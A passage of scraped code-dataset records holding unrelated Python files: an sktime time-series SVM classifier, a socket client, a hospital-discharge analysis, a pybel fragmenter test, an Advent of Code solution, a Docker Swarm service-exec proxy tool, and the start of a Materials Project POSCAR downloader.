None\n","repo_name":"sdss/sdsstools","sub_path":"test/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"33997033580","text":"\"\"\"Support vector classifier using time series kernels..\n\nDirect wrap of sklearn SVC with added functionality that allows time series kernel to be\npassed, and uses the sktime time series classifier interface.\n\"\"\"\n\n__author__ = [\"fkiraly\"]\n__all__ = [\"TimeSeriesSVC\"]\n\nfrom inspect import signature\n\nfrom sklearn.svm import SVC\n\nfrom sktime.classification.base import BaseClassifier\n\n\nclass TimeSeriesSVC(BaseClassifier):\n \"\"\"Support Vector Classifier, for time series kernels.\n\n An adapted version of the scikit-learn SVC for time series data.\n\n Any sktime pairwise transformers are supported as kernels,\n including time series kernels and standard kernels on \"flattened\" time series.\n\n Caveat: typically, SVC literature assumes kernels to be positive semi-definite.\n However, any pairwise transformer can be passed as kernel, including distances.\n This will still produce classification results, which may or may not be performant.\n\n Parameters\n ----------\n kernel : pairwise panel transformer or callable, optional, default see below\n pairwise panel transformer inheriting from ``BasePairwiseTransformerPanel``, or\n callable, must be of signature ``(X: Panel, X2: Panel) -> np.ndarray``\n output must be mxn array if ``X`` is Panel of m Series, ``X``2 of n Series\n if ``distance_mtype`` is not set, must be able to take\n ``X``, ``X2`` which are ``pd_multiindex`` and ``numpy3D`` mtype\n default = mean Euclidean kernel, same as ``AggrDist(RBF())``,\n where ``AggrDist`` is from ``sktime`` and ``RBF`` from ``sklearn``\n kernel_params : dict, optional. default = None.\n dictionary for distance parameters, in case that distance is a callable\n kernel_mtype : str, or list of str optional. default = None.\n mtype that ``kernel`` expects for X and X2, if a callable\n only set this if ``kernel`` is not ``BasePairwiseTransformerPanel`` descendant\n C : float, default=1.0\n Regularization parameter. The strength of the regularization is\n inversely proportional to C. Must be strictly positive. The penalty\n is a squared l2 penalty.\n shrinking : bool, default=True\n Whether to use the shrinking heuristic.\n probability : bool, default=False\n Whether to enable probability estimates. This must be enabled prior\n to calling ``fit``, will slow down that method as it internally uses\n 5-fold cross-validation, and ``predict_proba`` may be inconsistent with\n ``predict``.\n tol : float, default=1e-3\n Tolerance for stopping criterion.\n cache_size : float, default=200\n Specify the size of the kernel cache (in MB).\n class_weight : dict or 'balanced', default=None\n Set the parameter C of class i to class_weight[i]*C for\n SVC. If not given, all classes are supposed to have\n weight one.\n The \"balanced\" mode uses the values of y to automatically adjust\n weights inversely proportional to class frequencies in the input data\n as ``n_samples / (n_classes * np.bincount(y))``.\n verbose : bool, default=False\n Enable verbose output. Note that this setting takes advantage of a\n per-process runtime setting in libsvm that, if enabled, may not work\n properly in a multithreaded context.\n max_iter : int, default=-1\n Hard limit on iterations within solver, or -1 for no limit.\n decision_function_shape : ``{'ovo', 'ovr'}``, default='ovr'\n Whether to return a one-vs-rest ('ovr') decision function of shape\n (n_samples, n_classes) as all other classifiers, or the original\n one-vs-one ('ovo') decision function of libsvm which has shape\n (n_samples, n_classes * (n_classes - 1) / 2). However, one-vs-one\n ('ovo') is always used as multi-class strategy. The parameter is\n ignored for binary classification.\n break_ties : bool, default=False\n If true, ``decision_function_shape='ovr'``, and number of classes > 2,\n :term:`predict` will break ties according to the confidence values of\n :term:`decision_function`; otherwise the first class among the tied\n classes is returned. Please note that breaking ties comes at a\n relatively high computational cost compared to a simple predict.\n random_state : int, RandomState instance or None, default=None\n Controls the pseudo random number generation for shuffling the data for\n probability estimates. Ignored when `probability` is False.\n Pass an int for reproducible output across multiple function calls.\n\n Examples\n --------\n >>> from sktime.classification.kernel_based import TimeSeriesSVC\n >>> from sklearn.gaussian_process.kernels import RBF\n >>> from sktime.dists_kernels import AggrDist\n >>> from sktime.datasets import load_unit_test\n >>> X_train, y_train = load_unit_test(return_X_y=True, split=\"train\")\n >>> X_test, y_test = load_unit_test(return_X_y=True, split=\"test\")\n >>>\n >>> mean_gaussian_tskernel = AggrDist(RBF())\n >>> classifier = TimeSeriesSVC(kernel=mean_gaussian_tskernel)\n >>> classifier.fit(X_train, y_train)\n TimeSeriesSVC(...)\n >>> y_pred = classifier.predict(X_test)\n \"\"\"\n\n _tags = {\n \"capability:multivariate\": True,\n \"capability:unequal_length\": True,\n \"capability:missing_values\": True,\n \"capability:predict_proba\": True,\n \"X_inner_mtype\": [\"pd-multiindex\", \"numpy3D\"],\n \"classifier_type\": \"kernel\",\n }\n\n DELEGATED_PARAMS = [\n \"C\",\n \"shrinking\",\n \"probability\",\n \"tol\",\n \"cache_size\",\n \"class_weight\",\n \"verbose\",\n \"max_iter\",\n \"decision_function_shape\",\n \"break_ties\",\n \"random_state\",\n ]\n\n def __init__(\n self,\n kernel=None,\n kernel_params=None,\n kernel_mtype=None,\n C=1,\n shrinking=True,\n probability=False,\n tol=1e-3,\n cache_size=200,\n class_weight=None,\n verbose=False,\n max_iter=-1,\n decision_function_shape=\"ovr\",\n break_ties=False,\n random_state=None,\n ):\n self.kernel = kernel\n self.kernel_params = kernel_params\n self.kernel_mtype = kernel_mtype\n\n # naive dict comprehension does not work due to context of eval\n delegated_param_dict = {}\n for key in self.DELEGATED_PARAMS:\n delegated_param_dict[key] = eval(key)\n\n for key, val in delegated_param_dict.items():\n setattr(self, key, val)\n\n super().__init__()\n\n self.svc_estimator_ = SVC(kernel=\"precomputed\", **delegated_param_dict)\n\n if kernel_mtype is not None:\n self.set_tags(X_inner_mtype=kernel_mtype)\n\n from sktime.dists_kernels import BasePairwiseTransformerPanel\n\n # inherit capability tags from distance, if it is an estimator\n if isinstance(kernel, BasePairwiseTransformerPanel):\n inherit_tags = [\n \"capability:missing_values\",\n \"capability:unequal_length\",\n \"capability:multivariate\",\n ]\n self.clone_tags(kernel, inherit_tags)\n\n def _kernel(self, X, X2=None):\n \"\"\"Compute distance - unified interface to kernel callable.\"\"\"\n kernel = self.kernel\n kernel_params = self.kernel_params\n if kernel_params is None:\n kernel_params = {}\n\n if kernel is None:\n from sklearn.gaussian_process.kernels import RBF\n\n from sktime.dists_kernels.compose_tab_to_panel import AggrDist\n\n kernel = AggrDist(RBF())\n\n if X2 is not None:\n return kernel(X, X2, **kernel_params)\n # if X2 is None, check if kernel allows None X2 to mean \"X2=X\"\n else:\n sig = signature(kernel).parameters\n X2_sig = sig[list(sig.keys())[1]]\n if X2_sig.default is not None:\n return kernel(X, X2, **kernel_params)\n else:\n return kernel(X, **kernel_params)\n\n def _fit(self, X, y):\n \"\"\"Fit the model using X as training data and y as target values.\n\n Parameters\n ----------\n X : sktime compatible Panel data container, of mtype X_inner_mtype,\n with n time series to fit the estimator to\n y : {array-like, sparse matrix}\n Target values of shape = [n]\n \"\"\"\n # store full data as indexed X\n self._X = X\n\n kernel_mat = self._kernel(X)\n\n self.svc_estimator_.fit(kernel_mat, y)\n\n return self\n\n def _predict(self, X):\n \"\"\"Predict the class labels for the provided data.\n\n Parameters\n ----------\n X : sktime-compatible Panel data, of mtype X_inner_mtype, with n_samples series\n data to predict class labels for\n\n Returns\n -------\n y : array of shape [n_samples] or [n_samples, n_outputs]\n Class labels for each data sample.\n \"\"\"\n # self._X should be the stored _X\n kernel_mat = self._kernel(X, self._X)\n\n y_pred = self.svc_estimator_.predict(kernel_mat)\n\n return y_pred\n\n def _predict_proba(self, X):\n \"\"\"Return probability estimates for the test data X.\n\n Parameters\n ----------\n X : sktime-compatible Panel data, of mtype X_inner_mtype, with n_samples series\n data to predict class labels for\n\n Returns\n -------\n p : array of shape = [n_samples, n_classes], or a list of n_outputs\n of such arrays if n_outputs > 1.\n The class probabilities of the input samples. Classes are ordered\n by lexicographic order.\n \"\"\"\n # self._X should be the stored _X\n kernel_mat = self._kernel(X, self._X)\n\n y_pred = self.svc_estimator_.predict_proba(kernel_mat)\n\n return y_pred\n\n @classmethod\n def get_test_params(cls, parameter_set=\"default\"):\n \"\"\"Return testing parameter settings for the estimator.\n\n Parameters\n ----------\n parameter_set : str, default=\"default\"\n Name of the set of test parameters to return, for use in tests. If no\n special parameters are defined for a value, will return `\"default\"` set.\n For classifiers, a \"default\" set of parameters should be provided for\n general testing, and a \"results_comparison\" set for comparing against\n previously recorded results if the general set does not produce suitable\n probabilities to compare against.\n\n Returns\n -------\n params : dict or list of dict, default={}\n Parameters to create testing instances of the class.\n Each dict are parameters to construct an \"interesting\" test instance, i.e.,\n `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.\n `create_test_instance` uses the first (or only) dictionary in `params`.\n \"\"\"\n # testing that callables/classes can be passed\n from sktime.dists_kernels.compose_tab_to_panel import FlatDist\n\n # probability must be True, or predict_proba will not work\n dist1 = FlatDist.create_test_instance()\n params1 = {\"kernel\": dist1, \"probability\": True}\n\n # testing the default kernel\n params2 = {\"probability\": True}\n\n return [params1, params2]\n","repo_name":"sktime/sktime","sub_path":"sktime/classification/kernel_based/_svc.py","file_name":"_svc.py","file_ext":"py","file_size_in_byte":11435,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"71409196006","text":"import socket\n\nclient = socket.socket()\nclient.connect(('localhost',9999)) #can be given any IP address\nmsg=client.recv(1024).decode()\nprint(msg)\n\nwhile True:\n\tchoice = input(\"1. Create a file\\n 2. Delete a file\\n 3. Edit a file\\n 4. Read a file\\n 5. End connection\\n Enter a choice: \")\n\t\n\tif choice == \"1\":\n\t\tclient.send(bytes(\"1\",\"utf-8\"))\n\t\tfile = input(\"Enter file name: \")\n\t\tclient.send(bytes(file,\"utf-8\"))\n\t\tprint_msg=client.recv(1024).decode()\n\t\tprint(print_msg)\n\t\tprint(\"\\n\")\n\n\telif choice == \"2\":\n\t\tclient.send(bytes(\"2\",\"utf-8\"))\n\t\tfile = input(\"Enter file name: \")\n\t\tclient.send(bytes(file,\"utf-8\"))\n\t\tprint_msg=client.recv(1024).decode()\n\t\tprint(print_msg)\n\t\tprint(\"\\n\")\n\n\telif choice == \"3\":\n\t\tclient.send(bytes(\"3\",\"utf-8\"))\n\t\tfile = input(\"Enter file name: \")\n\t\tclient.send(bytes(file,\"utf-8\"))\n\t\tcontent = input(\"Enter the text to be added: \")\n\t\tclient.send(bytes(content,\"utf-8\"))\n\t\tprint_msg=client.recv(1024).decode()\n\t\tprint(print_msg)\n\t\tprint(\"\\n\")\n\n\telif choice == \"4\":\n\t\tclient.send(bytes(\"4\",\"utf-8\"))\n\t\tfile = input(\"Enter file name: \")\n\t\tclient.send(bytes(file,\"utf-8\"))\n\t\tprint_msg=client.recv(1024).decode()\n\t\tprint(print_msg)\n\t\tprint(\"\\n\")\n\n\telif choice == \"5\":\n\t\tclient.send(bytes(\"5\",\"utf-8\"))\n\t\tprint(\"The connection has been ended.\")\n\t\tquit()\n\n\telse:\n\t\tprint(\"Invalid choice!\")\n\n","repo_name":"aneeta001/CN-project","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"349892274","text":"# This descriptive analysis should be detailed enough \n# so a physician or nurse could understand what information\n# is contained in the dataset, and what potentially questions \n# might be asked and answered. \n\n############# IMPORT PACKAGES ###########\nimport pandas as pd\nimport numpy as np\nimport researchpy as rp\nfrom scipy import stats \nfrom tableone import TableOne, load_dataset\n########################################\n\n\n\n\n############# IMPORT DATASET ###########\nHospital_Inpatient_Discharges = pd.read_csv('/Users/brittanykusi-gyabaah/Downloads/Hospital_Inpatient_Discharges__SPARCS_De-Identified___2016.csv')\nHospital_Inpatient_Discharges.columns = Hospital_Inpatient_Discharges.columns.str.replace('[^A-Za-z0-9]+', '_')\nHospital_Inpatient_Discharges.info()\n########################################\n\n# Link Facility ID to Facilty's name\nFacility = pd.pivot_table(Hospital_Inpatient_Discharges, values=['Facility_Name'], index='Facility_Id', columns=None, aggfunc=np.sum)\nprint(Facility)\n\n# Link DRG Code to its description\nAPR_DRG = pd.pivot_table(Hospital_Inpatient_Discharges, values=['APR_DRG_Description'], index='APR_DRG_Code', columns=None, aggfunc=np.sum)\nprint(APR_DRG)\n\n\n\n\n######## CREATE SMALLER TABLE ###########\nHID = Hospital_Inpatient_Discharges[['Facility_Id', 'Age_Group', 'Gender', \n 'Type_of_Admission', 'APR_DRG_Description', \n 'Total_Charges', 'Length_of_Stay']]\nHID.dtypes\n#remove all commas within each column\nHID.replace(',','', regex=True, inplace=True)\nHID['Total_Charges'] = HID['Total_Charges'].astype(float)\nHID.dtypes\n#########################################\n\n# What are the top 50 facilities with the highest amount of discharges in 2016?\nHCounts = HID['Facility_Id'].value_counts()\nHCounts.head(50)\n# Relative frequency of facility discharges\nHID.Facility_Id.value_counts(normalize=True)*100\n\n\n\n\n##### Let's focus on Facility 1169 ######\n# facility 1169 had the highest frequency \n# discharges within the year 2016.\nHID1169 = HID[HID.Facility_Id.isin([\"1169\"])]\n#########################################\n\n# What is the mean of total charges for facility 1,169?\nHID1169['Total_Charges'] = HID1169['Total_Charges'].astype(float)\nHID1169.dtypes\nHID1169.Total_Charges.mean()\n\n# What is the mode for APR_DRG_Descriptions and type of admission? \nAPR_mode = HID1169.APR_DRG_Description.value_counts()\nAPR_mode.head(50)\n# the most frequent reason for visits --> Neonate birthwt >2499g, normal newborn or neonate w other problem\nType_of_Admission_mode = HID1169.Type_of_Admission.value_counts()\nType_of_Admission_mode.head(50)\n# emergency visits were the highest\n\n\n\n\n################# TABLE0NE TABLE #################\nHID1169_clone = HID1169\nHID1169_clone.dtypes\nlist(HID1169_clone)\nHID1169_clone.head(5)\nHID1169_clone['APR_DRG_Description']\nHID1169_clone_columns = ['Facility_Id', 'Age_Group', 'Gender', \n 'Type_of_Admission', 'APR_DRG_Description', \n 'Total_Charges', 'Length_of_Stay']\nHID1169_clone_categories=['Gender', 'Type_of_Admission', 'APR_DRG_Description', 'Age_Group', 'Length_of_Stay']\nHID1169_clone_groupby = ['Facility_Id']\nHID1169_clone['Gender'].value_counts()\nHID1169_clone_table1 = TableOne(HID1169_clone, columns=HID1169_clone_columns, \n categorical=HID1169_clone_categories, groupby=HID1169_clone_groupby, pval=False)\nprint(HID1169_clone_table1.tabulate(tablefmt = \"fancy_grid\"))\nHID1169_clone_table1.to_csv('/Users/brittanykusi-gyabaah/Documents/GitHub/descriptives-nydischarges/data.csv')\n","repo_name":"Brittanykusi/descriptives-nydischarges","sub_path":"Script/nydischarges.py","file_name":"nydischarges.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"333418723","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 02 23:39:19 2016\r\n\r\n@author: ilaponog\r\n\"\"\"\r\n\r\nimport pybel;\r\nimport openbabel;\r\nimport Fragmenter_V2 as fg;\r\nimport os;\r\n\r\ndef PybelModel_To_Fragmenter(mol):\r\n \r\n atoms=[];atomsXYZ=[];\r\n for i in mol.atoms:\r\n aname=i.type;\r\n if aname[-1:] in '0123456789':\r\n aname=aname[:-1];\r\n if i.OBAtom.IsAromatic():\r\n ar=1;\r\n aname=aname.replace('ar','');\r\n else:\r\n ar=0;\r\n isotope=0;\r\n '''\r\n Place isotope treatment block here...... To be added.....\r\n \r\n '''\r\n atoms.append([i.OBAtom.GetExactMass(),aname,isotope, i.formalcharge,ar]);\r\n atomsXYZ.append([i.OBAtom.GetX(),i.OBAtom.GetY(),i.OBAtom.GetZ()])\r\n bonds=[];\r\n for pb in openbabel.OBMolBondIter( mol.OBMol):\r\n if pb.IsAromatic():\r\n bo=4;\r\n else:\r\n bo=pb.GetBondOrder();\r\n i=pb.GetBeginAtomIdx()-1;\r\n j=pb.GetEndAtomIdx()-1;\r\n bonds.append([i,j,bo]);\r\n forces=[1.0]*len(atoms);\r\n '''\r\n Place force estimations here if needed.\r\n '''\r\n return [atoms,forces,bonds,atomsXYZ];\r\n \r\n\r\ndef FragmenterHTML_Generate(out_path,out_name,fragmenter,title='Fragmenter Results'): \r\n cc=0;\r\n if not os.path.exists(out_path+'/'+out_name):\r\n os.makedirs(out_path+'/'+out_name);\r\n fout=open(out_path+'/'+out_name+'.html','w');\r\n \r\n fout.write('\\n');\r\n fout.write('\\n');\r\n fout.write('\\n');\r\n fout.write('%s\\n'%title);\r\n fout.write('\\n');\r\n fout.write('\\n');\r\n fout.write('\\n');\r\n fout.write('\\n');\r\n\r\n \r\n for i in fragmenter.Fragments:\r\n fout.write('\\n');\r\n fout.write('\\n'%i[0]);\r\n if len(i)>1:\r\n for j in i[1]:\r\n #fout.write('\\n'%j);\r\n sdf=fragmenter.GenerateSDFFromAtomNumbers(j);\r\n mol2=pybel.readstring('sdf',sdf);\r\n mol2.title='';\r\n \r\n cc+=1;\r\n filename=out_name+'/%s.png'%cc;\r\n print(filename);\r\n \r\n \r\n \r\n \r\n #mol2.make3D();\r\n mol2.draw(show=False,filename=filename,usecoords=False);\r\n mm2=mol2.exactmass; \r\n \r\n mm=0.0;hh=0;\r\n for atom in mol2.atoms:\r\n mm+=atom.exactmass;\r\n \r\n \r\n v=atom.OBAtom.GetValence();\r\n vv=atom.OBAtom.GetImplicitValence();\r\n hh+=vv-v;\r\n \r\n \r\n #mol2.addh();\r\n #mm=mol2.exactmass-mm;\r\n \r\n fout.write('\\n');\r\n \r\n \r\n \r\n fout.write('\\n');\r\n \r\n \r\n \r\n fout.write('
%12.3f%s

SMILES: %s -%s x [H]

Mass: %10.3f

Mass2: %10.3f

'%(filename,mol2.write('smi'),hh,mm,mm2));\r\n \r\n #for atom in mol2.atoms:\r\n # v=atom.OBAtom.GetValence();\r\n # vv=atom.OBAtom.GetImplicitValence();\r\n # atom.OBAtom.SetImplicitValence(v);\r\n # vv=atom.OBAtom.GetImplicitValence();\r\n # fout.write('

Valence %s

ImplicitValence: %s

'%(v,vv));\r\n \r\n \r\n \r\n fout.write('
\\n');\r\n\r\n \r\n\r\n\r\n fout.write('\\n');\r\n fout.write(' \\n');\r\n \r\n #for i in fragmenter.GroupAtomNumbers:\r\n # if len(i)>groupY:\r\n # groupY=len(i);\r\n \r\n \r\n fout.close();\r\n \r\n\r\n#-------------------------------------------------------------------------------\r\nif __name__=='__main__':\r\n \r\n mol=pybel.readstring('smi','c1cnccc1C=CC#CC');\r\n mol.addh();\r\n mol.make3D();\r\n atoms,forces,bonds,atomsXYZ=PybelModel_To_Fragmenter(mol);\r\n \r\n frag=fg.FragmenterBasic(atoms,forces,bonds,atomsXYZ,0.0,True,2,True);\r\n frag.SortResults(False);\r\n print(frag.Fragments);\r\n if frag.ReturnAtomNumbers:\r\n sdf=frag.GenerateSDFFromAtomNumbers(frag.Fragments[len(frag.Fragments)-1][1][0]);\r\n print(sdf);\r\n mol2=pybel.readstring('sdf',sdf);\r\n print(mol.write('inchi')); \r\n print(mol2.write('inchi'));\r\n currentpath=os.path.dirname(os.path.realpath(__file__)).replace('\\\\','/');\r\n print(currentpath);\r\n FragmenterHTML_Generate(currentpath,'FragResults',frag,'FragmenterBasic');\r\n \r\n \r\n #for i in frg[2]:\r\n # print(\"%s%s-%s%s\"%(frg[0][i[0]][1],i[0],frg[0][i[1]][1],i[1]));\r\n\r\n atoms=[[12.0,'C',0,0,0], [12.0,'C',0,0,0], [12.0,'C',0,0,0], [12.0,'C',0,0,0], [12.0,'C',0,0,0], [12.0,'C',0,0,0], [14.003074,'N',0,0,0], [12.0,'C',0,0,0], [14.003074,'N',0,0,0], [14.003074,'N',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0]];\r\n forces=[0.007588212767180424, 0.006661618572088917, 0.009570650970545316, 0.019269484295123207, 0.08017421296776164, 0.0144983061079562, 0.06769232697285564, 0.1374647546245946, 0.03697424664546933, 0.0315693346778167, 0.007913059711641258, 0.0006550076335433046, 0.0005430184158939733, 0.0007928871294200714, 0.0026211724475890554, 0.010472723714488033, 0.008070656478874566, 0.03771033870174066, 0.0335120686022215];\r\n bonds=[[0, 1, 4], [0, 5, 4], [0, 11, 1], [1, 2, 4], [1, 12, 1], [2, 3, 4], [2, 13, 1], [3, 4, 4], [3, 9, 1], [4, 5, 4], [4, 6, 1], [5, 14, 1], [6, 7, 1], [6, 17, 1], [6, 18, 1], [7, 8, 1], [7, 9, 1], [8, 15, 1], [8, 16, 1], [9, 10, 1]];\r\n \r\n frag=fg.FragmenterBasic(atoms,forces,bonds,breakage_threshold=0.5,breakage_threshold_absolute=False,fragmentation_depth=2,Group_Atom_Numbers=True);\r\n \r\n frag.SortResults(Ascending=True);\r\n print(frag.Fragments);\r\n if frag.ReturnAtomNumbers:\r\n sdf=frag.GenerateSDFFromAtomNumbers(frag.Fragments[len(frag.Fragments)-1][1][0]);\r\n print(sdf);\r\n mol2=pybel.readstring('sdf',sdf);\r\n print(mol.write('inchi')); \r\n print(mol2.write('inchi'));\r\n currentpath=os.path.dirname(os.path.realpath(__file__)).replace('\\\\','/');\r\n print(currentpath);\r\n FragmenterHTML_Generate(currentpath,'FragResults2',frag,'FragmenterBasic');\r\n \r\n\r\n","repo_name":"emiliecauet/Fukui","sub_path":"Fragmenter/PybelTest.py","file_name":"PybelTest.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27928921001","text":"from typing import List\n\nfrom advent_of_code import static_files\n\n\ndef max_calories(ledger: List[str], number_of_elves: int = None):\n elves = parse_ledger(ledger)\n calories = sorted(elves, reverse=True)\n number_of_elves = number_of_elves or 1\n return sum(calories[:number_of_elves])\n\n\ndef parse_ledger(ledger: List[str]) -> List[int]:\n elves = [0]\n for entry in ledger:\n if len(entry) == 0:\n elves.append(0)\n else:\n elves[-1] += int(entry)\n return elves\n\n\nif __name__ == \"__main__\":\n ledger = static_files.get(\"day_01.txt\")\n print(f\"The top elf has :{max_calories(ledger)}\")\n print(f\"The top three elves have :{max_calories(ledger, 3)}\")\n","repo_name":"mikealfare/advent-of-code-2022","sub_path":"advent_of_code/day_01.py","file_name":"day_01.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16630148875","text":"#!/bin/python3\nimport random\nimport string\nimport subprocess\nimport os\nimport docker\nimport time\nimport sys\nimport click\nfrom typing import List\n\nif len(sys.argv) >= 2:\n if sys.argv[1] == 'docker-cli-plugin-metadata':\n print(\"\"\"\n{\n \"SchemaVersion\": \"0.1.0\",\n \"Vendor\": \"Martin Braun\",\n \"Version\": \"0.0.1\",\n \"ShortDescription\": \"Docker Swarm Proxy\"\n}\n \"\"\")\n exit(0)\n\nif 'swarmproxy' in sys.argv and len(sys.argv) >= 2:\n # we need to strip the first agument for click to work\n # if we run as a docker cli plugin\n sys.argv = sys.argv[1:]\n\ndef get_random_string(length):\n return ''.join(random.choice(string.ascii_letters) for i in range(length))\n\nrandom_str = get_random_string(32)\n\nstack_name = f\"docker_swarm_proxy_{random_str}\"\nnetwork_name = stack_name\nproxy_service_name = \"srv\"\nproxy_shell_container_name = f\"proxy_shell_{random_str}\"\n\nTEMPLATE = f\"\"\"\nversion: \"3.8\"\n\nservices:\n {proxy_service_name}:\n image: tecnativa/docker-socket-proxy\n volumes:\n - /var/run/docker.sock:/var/run/docker.sock\n networks:\n docker_swarm_proxy:\n environment:\n CONTAINERS: 1\n SERVICES: 1\n SWARM: 1\n NODES: 1\n NETWORKS: 1\n TASKS: 1\n VERSION: 1\n\n AUTH: 1\n SECRETS: 1\n POST: 1\n BUILD: 1\n COMMIT: 1\n CONFIGS: 1\n DISTRIBUTION: 1\n EXEC: 1\n GRPC: 1\n IMAGES: 1\n INFO: 1\n PLUGINS: 1\n SESSION: 1\n SYSTEM: 1\n VOLUMES: 1\n deploy:\n mode: global\n\nnetworks:\n docker_swarm_proxy:\n driver: overlay\n attachable: true\n name: {network_name}\n driver_opts:\n encrypted: \"\"\n com.docker.network.driver.mtu: \"1350\"\n\"\"\"\n\n\nif os.path.isfile(\"/bin/docker\"):\n docker_binary = \"/bin/docker\"\nelif os.path.isfile(\"/usr/bin/docker\"):\n docker_binary = \"/usr/bin/docker\"\n\n@click.group()\ndef cli() -> None:\n pass\n\n@click.group()\ndef service() -> None:\n \"\"\"\n Docker Swarm Service Utilities\n \"\"\"\n pass\n\n@service.command('exec')\n@click.option('-i', '--interactive', is_flag=True, show_default=True, default=False, help='Keep STDIN open even if not attached')\n@click.option('-t', '--tty', is_flag=True, show_default=True, default=False, help='Allocate a pseudo-TTY')\n@click.option('-u', '--user', help='Username or UID (format: \"[:]\")')\n@click.argument('service')\n@click.argument('command')\n@click.argument('arg', nargs=-1)\ndef service_exec(\n interactive: bool,\n tty: bool,\n user: string,\n service: string,\n command: string,\n arg: List[str]\n):\n \"\"\"\n Exec into a running service task.\n By default chooses the first task.\n \"\"\"\n def get_running_tasks(service):\n return [\n task\n for task in service.tasks()\n if \"Spec\" in task \n and \"DesiredState\" in task\n and task[\"DesiredState\"] == \"running\"\n and \"Status\" in task\n and \"State\" in task[\"Status\"]\n and task[\"Status\"][\"State\"] == \"running\"\n ]\n\n needs_cleanup = False\n\n try:\n # force usage of the regular SSH client\n # to be able to pick up DOCKER_HOST env var automatically\n from_env = docker.from_env(use_ssh_client=True)\n\n def get_service(name):\n # get all service with similar name\n services = from_env.services.list(filters={\"name\": name})\n # exact match required\n services = [service for service in services if service.attrs[\"Spec\"][\"Name\"] == name]\n if len(services) != 1:\n raise AssertionError(f'did not find exactly one service with name {name}')\n return services[0]\n\n service = get_service(service)\n \n running_tasks = get_running_tasks(service)\n if len(running_tasks) == 0:\n raise AssertionError(f\"didn't find running task for service {service}\")\n \n running_task = running_tasks[0]\n node_id_running_task = running_task[\"NodeID\"]\n container_id = running_task[\"Status\"][\"ContainerStatus\"][\"ContainerID\"]\n\n # TODO: dont deploy the service to all nodes, but instead only\n # to the one we care about that is running the task\n needs_cleanup = True\n subprocess.run(\n [docker_binary, \"stack\", \"deploy\", \"-c\", \"-\", stack_name],\n env={\n **os.environ,\n },\n cwd=os.getcwd(),\n input=TEMPLATE.encode('utf-8'),\n check=True\n )\n\n while True:\n # wait for proxy service to be there\n service = get_service(f'{stack_name}_{proxy_service_name}')\n all_tasks = service.tasks()\n desired_running = [\n task\n for task in all_tasks\n if \"Spec\" in task \n and \"DesiredState\" in task\n and task[\"DesiredState\"] == \"running\"\n ]\n actually_running = [\n task\n for task in desired_running\n if \"Status\" in task\n and \"State\" in task[\"Status\"]\n and task[\"Status\"][\"State\"] == \"running\"\n ]\n if len(desired_running) != len(actually_running):\n time.sleep(1)\n else:\n break\n \n interactive_str = '-i' if interactive else ''\n tty_str = '-t' if tty else ''\n user_str = user or ''\n\n docker_flags = [elem for elem in [interactive_str, tty_str] if elem != '']\n\n subprocess.run(\n [\n docker_binary, \n \"run\", \n \"--env\", f\"PROXY_SERVICE_NAME={proxy_service_name}\",\n \"--env\", f\"CONTAINER_ID={container_id}\",\n \"--env\", f\"USER_FLAG={user_str}\",\n \"--env\", f\"IS_TTY={tty_str}\",\n \"--env\", f\"IS_INTERACTIVE={interactive_str}\",\n \"--env\", f\"NODE_ID_RUNNING_TASK={node_id_running_task}\",\n \"--name\", proxy_shell_container_name,\n \"--network\", network_name,\n \"--pull\", \"always\",\n \"--rm\",\n \"--entrypoint\", \"python3\",\n *docker_flags,\n \"ghcr.io/neuroforgede/docker-swarm-proxy/service-exec:master\",\n \"service_exec.py\",\n command,\n *arg\n ],\n env={\n **os.environ,\n },\n cwd=os.getcwd(),\n check=True\n )\n finally:\n if needs_cleanup:\n # hack, ensure that the proxy container is dead and removed\n subprocess.run(\n [docker_binary, \"kill\", proxy_shell_container_name],\n env={\n **os.environ,\n },\n cwd=os.getcwd(),\n stdout=None,\n stderr=None,\n check=False,\n capture_output=True\n )\n # hack, ensure that the proxy container is dead and removed\n subprocess.run(\n [docker_binary, \"rm\", proxy_shell_container_name],\n env={\n **os.environ,\n },\n cwd=os.getcwd(),\n stdout=None,\n stderr=None,\n check=False,\n capture_output=True\n )\n\n # do the proper cleanup of the stack\n subprocess.run(\n [docker_binary, \"stack\", \"rm\", stack_name],\n env={\n **os.environ,\n },\n cwd=os.getcwd(),\n check=True\n )\n\n\ncli.add_command(service)\nif __name__ == '__main__':\n cli()","repo_name":"neuroforgede/docker-swarm-proxy","sub_path":"docker_swarm_proxy.py","file_name":"docker_swarm_proxy.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"5903889636","text":"\"\"\"\nThis script extracts the POSCAR files (containing atomic structure information) \nfor materials from Material Projects https://materialsproject.org/, by material\nids, and the material ids are extracted from csv files\n\"\"\"\n\n#first load needed packages\n\nfrom pymatgen import MPRester\n\nimport pandas as pd\n\nmaterial_data = pd.read_csv(\"Your file name here\") #change filename here\nmaterial_data=pd.DataFrame(material_data)\n\nmat_id=material_data['material_id']\nmid_list=list(mat_id)\nprint(mid_list)\n\n#put my API key from https://materialsproject.org/ in the mpr\nAPI_key=\"YOUR_APT_KEY\"\nmpr = MPRester(API_key)\n\n\ndef get_poscar_file(material_id):\n structure=mpr.get_structure_by_material_id(material_id)\n file_name='POS_files/POSCAR.'+material_id\n pos_str=structure.to(fmt='poscar')\n openfile=open(file_name,'wt')\n openfile.write(pos_str)\n openfile.close()\n\n\nprint('running----------------------------')\nfor material_id in 